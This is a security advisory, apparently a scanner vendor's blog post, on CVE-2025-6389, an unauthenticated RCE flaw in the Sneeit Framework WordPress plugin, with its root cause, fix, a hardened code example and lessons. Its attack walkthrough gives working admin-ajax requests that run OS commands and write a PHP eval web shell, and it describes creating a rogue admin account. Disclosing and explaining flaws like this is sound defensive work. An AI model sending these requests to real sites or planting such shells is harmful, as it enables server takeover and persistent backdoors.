CVSS 9.8 (Critical)

CVE-2025-6389: Sneeit Framework Unauthenticated Remote Code Execution

Overview

  • CVE: CVE-2025-6389
  • Affected Versions: Sneeit Framework <= 8.3 (bundled with multiple premium themes)
  • CVSS: 9.8 (Critical)
  • Authentication: None required (unauthenticated)
  • Type: Arbitrary PHP Function Invocation + Remote Code Execution (RCE)

On August 5, 2025, a critical unauthenticated remote code execution vulnerability was patched in Sneeit Framework, a plugin bundled with several premium WordPress themes. Public disclosure followed on November 24, 2025, triggering an immediate wave of exploitation in the wild.

Despite an active install base of only approximately 1,700 sites, more than 131,000 exploitation attempts were blocked within weeks of disclosure. Confirmed attacks included web shell deployment and rogue administrator account creation — a disproportionate attack volume that illustrates how modern exploit automation targets every WordPress site regardless of how obscure its plugin stack is.

What Happened

The root cause is the sneeit_articles_pagination_callback function passing unsanitized user input directly to PHP's built-in call_user_func.

call_user_func dynamically invokes a PHP function by name: it takes a string as its first argument and calls that function. When that string is controlled by the attacker, it means the attacker can call any PHP function available in the runtime environment — no authentication required.

The vulnerable code was conceptually structured like this:

// Vulnerable code (conceptual)
function sneeit_articles_pagination_callback() {
    $type = $_POST['type']; // user input, taken verbatim
    // no sanitization, no whitelist check
    call_user_func($type);  // arbitrary PHP function executed
}

When the value passed to call_user_func originates from user input, an attacker can supply any of these dangerous function names:

  • system — execute OS commands
  • passthru — execute OS commands and pass output through directly
  • phpinfo — leak PHP configuration and environment details
  • assert — evaluate and execute arbitrary PHP code as a string

Using call_user_func safely requires that the first argument be validated against a strict whitelist of known-safe function names before the call is made. The complete absence of that validation turned a utility function into an unauthenticated RCE primitive.

How the Attack Works

Attack flow:

  1. Target identification: Scan for WordPress sites using premium themes that bundle Sneeit Framework (themes by Neoustheme, SmithTheme, and others). Presence can be confirmed by probing /wp-content/plugins/sneeit-framework/ or by reading the theme credit in the page footer.

  2. Endpoint discovery: Sneeit Framework registers its callback via admin-ajax.php. Because no authentication check is present, the action is callable by any unauthenticated visitor.

  3. Send a minimal payload: Set the type parameter to the desired PHP function name and POST to admin-ajax.php.

POST /wp-admin/admin-ajax.php
action=sneeit_articles_pagination
type=phpinfo

  4. Execute OS commands: Because the handler also forwards additional POST parameters to call_user_func as arguments, functions that accept arguments are fully exploitable.

POST /wp-admin/admin-ajax.php
action=sneeit_articles_pagination
type=system
arg=id

Server response: uid=33(www-data) gid=33(www-data) groups=33(www-data)

  5. Deploy a web shell: Call a file-writing function to establish persistent access on the server.

type=file_put_contents
arg[0]=/var/www/html/wp-content/uploads/shell.php
arg[1]=<?php @eval($_POST['c']); ?>

  6. Create a rogue administrator: Call WordPress functions such as wp_create_user and add_user_meta directly to insert a new admin account, creating a persistent backdoor that survives plugin updates or removal.

Real-World Impact

  • More than 131,000 exploitation attempts were blocked in the weeks following public disclosure
  • Against an install base of approximately 1,700 sites, this represents an average of over 77 attack attempts per site
  • Web shell deployment was confirmed, with attackers establishing persistent server access on compromised sites
  • Rogue administrator account creation was confirmed, leaving affected sites exposed to password resets and content manipulation
  • No authentication is required and the exploit payload is trivially simple, making automated botnet-scale scanning straightforward
  • The patch was released on August 5, 2025, but public disclosure was delayed until November 24, 2025. Despite that roughly three-month head start, many sites were still running the vulnerable version when disclosure triggered mass exploitation

Fix and Lessons

Fix: Patched in version 8.4 (released August 5, 2025). The fix removes the call_user_func dispatch from sneeit_articles_pagination_callback entirely, replacing it with a direct implementation of the pagination logic so that no user-supplied value is ever treated as a callable.

Lessons:

  1. Never pass user input to call_user_func: This is one of the foundational rules of PHP security. The function name passed to call_user_func must always come from a hardcoded, developer-controlled whitelist — never from request parameters, cookies, or any other user-supplied source.
  2. Whitelist dynamic dispatch strictly: If dynamic function invocation is genuinely necessary, validate the input with a strict equality check against an explicit allowlist before the call: in_array($type, ['allowed_func_1', 'allowed_func_2'], true). A loose comparison (==) is not sufficient.
  3. Unauthenticated endpoints are the highest-priority attack surface: Any admin-ajax.php action that lacks an authentication check is callable by anyone on the internet. Every callback function should begin with check_ajax_referer() or a current_user_can() check. The absence of either one is a red flag in any code review.
  4. Bundled plugins are routinely missed in update workflows: Plugins shipped inside a theme directory do not appear in the WordPress admin update dashboard. Fixes for vulnerabilities in bundled components are delivered only through a theme update, making it easy for site owners to remain unaware that a critical patch exists.
  5. A small install base does not equal a small attack surface: The 131,000 attack attempts against 1,700 sites prove that modern exploit automation sweeps every WordPress installation it finds. Attackers do not manually curate target lists — they scan everything. Obscurity provides zero protection.
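Applying lessons 1 to 3 to the conceptual handler shown earlier, as an added example that is not the vendor's 8.4 fix (which removed call_user_func entirely): the request value is only ever a key into a hardcoded map, the call is gated by a nonce, and arguments are typed and bounded rather than forwarded verbatim. The handler names, the nonce action and the page parameter are assumptions; only the admin-ajax action name comes from the advisory.

```php
<?php
// Added example, not the plugin's real code or its actual patch.
// Hardened counterpart of the conceptual vulnerable handler above.

// Explicit allowlist. Request values are only ever *keys* into this map;
// the callable comes from the map value, never from the request.
const SNEEIT_PAGINATION_HANDLERS = [
    'latest'  => 'sneeit_paginate_latest',   // assumed handler names
    'popular' => 'sneeit_paginate_popular',
];

function sneeit_paginate_latest(int $page): array {
    return ['type' => 'latest', 'page' => $page];   // stand-in for the real query
}
function sneeit_paginate_popular(int $page): array {
    return ['type' => 'popular', 'page' => $page];
}

function sneeit_articles_pagination_callback_hardened(): void {
    // 1. Nonce: the request must originate from a page this site rendered
    //    ('sneeit_pagination' is an assumed nonce action name).
    check_ajax_referer('sneeit_pagination', 'nonce');

    // 2. Authorization: a nonce alone is not an access check. Public
    //    pagination may be fine for any visitor, but any handler that
    //    changes state must also gate on a capability, e.g.
    //    if (!current_user_can('edit_posts')) { wp_send_json_error(null, 403); }

    // 3. Strict allowlist: exact key match, no loose comparison.
    $type = isset($_POST['type']) ? sanitize_key(wp_unslash($_POST['type'])) : '';
    if (!array_key_exists($type, SNEEIT_PAGINATION_HANDLERS)) {
        wp_send_json_error(['message' => 'invalid type'], 400);
    }

    // 4. Arguments are cast and bounded, never passed through as received.
    $page = max(1, min(10000, (int) ($_POST['page'] ?? 1)));

    // Dispatch through the map value; the raw request string is never callable.
    $handler = SNEEIT_PAGINATION_HANDLERS[$type];
    wp_send_json_success($handler($page));
}

add_action('wp_ajax_sneeit_articles_pagination', 'sneeit_articles_pagination_callback_hardened');
add_action('wp_ajax_nopriv_sneeit_articles_pagination', 'sneeit_articles_pagination_callback_hardened');
```

With this shape, a request such as type=system or type=file_put_contents fails the array_key_exists check and is rejected with a 400 before anything is invoked.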

Detection with Nyambush

Nyambush automatically detects the versions of all WordPress components, including plugins bundled inside themes, and cross-references them against its vulnerability database. If Sneeit Framework is running at version 8.3 or below, Nyambush raises a Critical alert with CVSS 9.8 immediately.

In continuous monitoring mode, the alert persists until an update to version 8.4 is confirmed. When Nyambush detects that a theme update has delivered a patched version of Sneeit Framework, the alert is automatically resolved.
